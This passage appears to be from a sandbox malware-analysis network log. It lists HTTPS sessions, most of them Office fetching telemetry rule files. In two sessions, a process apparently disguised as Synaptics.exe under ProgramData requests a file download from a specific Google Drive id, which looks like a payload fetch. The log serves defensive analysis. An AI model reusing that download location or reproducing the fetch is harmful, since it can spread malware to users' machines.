                                                                                        2024-12-05 21:50:41 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        75192.168.2.54985313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:41 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:41 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:41 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                        ETag: "0x8DC582B9C710B28"
                                                                                        x-ms-request-id: 686307fb-901e-0029-3dcc-45274a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215041Z-1746fd949bd2cq7chC1EWRnx9g00000002u000000001060p
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:41 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        76192.168.2.54985913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:41 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:42 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:42 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 477
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                        ETag: "0x8DC582BA54DCC28"
                                                                                        x-ms-request-id: bbae04f8-a01e-0032-80cc-451949000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215042Z-1746fd949bdmv56chC1EWRypnn00000003e000000000ettb
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:42 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        77192.168.2.54986113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:42 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:43 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:43 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                        ETag: "0x8DC582BB7F164C3"
                                                                                        x-ms-request-id: 71541f9e-801e-0078-2fc7-45bac6000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215043Z-1746fd949bddgsvjhC1EWRum2c00000003p0000000001fd3
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:43 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        78192.168.2.549863172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:43 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:43 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:43 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-s2oBeVpyEa36MmexDgcXsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        79192.168.2.549864172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:43 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:43 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:43 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-eicDvJAk6CjekmDBdReZpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        80192.168.2.54986213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:43 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:43 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:43 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 477
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                        ETag: "0x8DC582BA48B5BDD"
                                                                                        x-ms-request-id: f87bd39b-701e-0097-59cc-45b8c1000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215043Z-1746fd949bd6ztf6hC1EWRvq2s00000002v000000000vtu0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:43 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        81192.168.2.54986513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:43 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:43 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:43 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                        ETag: "0x8DC582B9FF95F80"
                                                                                        x-ms-request-id: e55982d9-501e-0047-225f-47ce6c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215043Z-1746fd949bd5gpk5hC1EWR8dk40000000100000000000qwt
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:43 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        82192.168.2.54986613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:43 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:43 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:43 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                        ETag: "0x8DC582BB650C2EC"
                                                                                        x-ms-request-id: 5cfda45f-901e-00ac-3dce-45b69e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215043Z-1746fd949bdl6zq5hC1EWRf3ws00000002wg00000000t0ga
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:43 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        83192.168.2.54986913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:44 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:44 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:44 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 468
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                        ETag: "0x8DC582BB3EAF226"
                                                                                        x-ms-request-id: 2accf417-001e-0014-64cb-455151000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215044Z-1746fd949bdhk6hphC1EWRaw3c000000032g00000000b5fg
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:44 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        84192.168.2.54987013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:45 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:45 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:45 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 485
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                        ETag: "0x8DC582BB9769355"
                                                                                        x-ms-request-id: 6fdb675e-b01e-0070-05ce-451cc0000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215045Z-1746fd949bd2cq7chC1EWRnx9g0000000310000000001459
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:45 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        85192.168.2.54987113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:45 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:45 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:45 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 411
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B989AF051"
                                                                                        x-ms-request-id: f6fadb53-501e-0064-5acb-451f54000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215045Z-1746fd949bdjzh7thC1EWR3g6400000003b000000000cv0w
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
